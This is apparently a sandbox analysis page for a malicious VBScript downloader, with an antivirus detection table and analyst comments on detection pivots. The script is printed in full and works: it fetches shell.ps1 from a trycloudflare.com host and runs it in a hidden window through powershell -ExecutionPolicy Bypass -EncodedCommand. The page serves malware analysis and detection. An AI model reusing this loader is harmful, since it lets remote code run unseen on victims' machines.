Static | ZeroBOX
No static analysis available.
' Analyst summary: top-level downloader stage. It fetches a PowerShell script
' over HTTPS and passes the response body to powershell.exe as a Base64
' -EncodedCommand argument. Nothing in this script writes the payload to disk.
' Detection pivots: a script host (wscript.exe or cscript.exe; which one is not
' shown here) spawning powershell.exe with -ExecutionPolicy Bypass and
' -EncodedCommand, and an MSXML2.XMLHTTP request to a trycloudflare.com subdomain.
Dim url, objHTTP, objShell, scriptContent, encodedCommand
' Define URL of the PowerShell script
' NOTE(review): the host is a trycloudflare.com subdomain, which looks like a
' Cloudflare quick-tunnel name; the origin server behind it cannot be determined
' from the hostname alone - confirm with network telemetry.
url = "https://dat-voip-sit-cio.trycloudflare.com/shell.ps1"
' Create XMLHTTP object to download the file
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
' Third argument False makes the request synchronous, so Send blocks until the
' response has arrived.
objHTTP.Open "GET", url, False
objHTTP.Send
' Only an HTTP 200 response is acted on; any other status falls through to cleanup.
If objHTTP.Status = 200 Then
scriptContent = objHTTP.responseText
' The response text is re-encoded as UTF-16LE bytes and then Base64 (see
' Base64Encode / Stream_StringToBytes below), the form -EncodedCommand expects.
encodedCommand = Base64Encode(scriptContent)
' Execute PowerShell script in-memory
' The whole payload travels on the command line, so process-creation logging
' with command-line capture (Windows Security 4688, Sysmon Event ID 1) and
' PowerShell script block logging (4104) can record it even though this script
' writes no file.
Set objShell = CreateObject("WScript.Shell")
' Window style 0 hides the window; True makes Run wait for powershell to exit.
objShell.Run "powershell -ExecutionPolicy Bypass -EncodedCommand " & encodedCommand, 0, True
End If
' Cleanup
Set objHTTP = Nothing
Set objShell = Nothing
' Base64 Encoding Functions
' Base64Encode: returns sText as a single-line Base64 string.
' sText is first converted to bytes by Stream_StringToBytes (UTF-16LE, BOM
' removed). The bytes are then assigned to an MSXML element typed "bin.base64",
' whose .text property yields the Base64 form.
' Analyst note: this is the helper that builds the powershell -EncodedCommand
' argument, so decoding that argument as Base64 and then UTF-16LE recovers the
' downloaded script text.
Function Base64Encode(sText)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
' Typing the node as bin.base64 makes MSXML do the encoding.
oNode.dataType = "bin.base64"
oNode.nodeTypedValue = Stream_StringToBytes(sText)
' Strip the line feeds in the node text so the result is one unbroken token.
Base64Encode = Replace(oNode.text, vbLf, "")
End Function
' Stream_StringToBytes: returns sText as a byte array encoded UTF-16LE, without
' the leading byte-order mark.
' It writes the string into an ADODB.Stream in text mode, switches the same
' stream to binary mode, and reads the bytes back starting after the BOM.
Function Stream_StringToBytes(sText)
Dim oStream
Set oStream = CreateObject("ADODB.Stream")
oStream.Type = 2 ' Text
oStream.Charset = "utf-16le" ' PowerShell uses UTF-16LE
oStream.Open
oStream.WriteText sText
' Rewind before changing Type; the mode is switched here only at position 0.
oStream.Position = 0
oStream.Type = 1 ' Binary
' The stream starts with a 2-byte BOM; reading from offset 2 leaves it out of
' the encoded command.
oStream.Position = 2 ' Skip UTF-16LE BOM
Stream_StringToBytes = oStream.Read
oStream.Close
End Function
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.VBS.Dropper.zp
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-Script.Save.d1d20a66
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 VBS/TrojanDownloader.Agent.ABVR
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan.VBS.Alien.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
huorong Clean
FireEye Clean
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:VBS/Obfuse.ZDO!MTB
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:dnjkLnnaHyD)
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
GData Clean
AVG Clean
Panda Clean
alibabacloud Clean
No IRMA results available.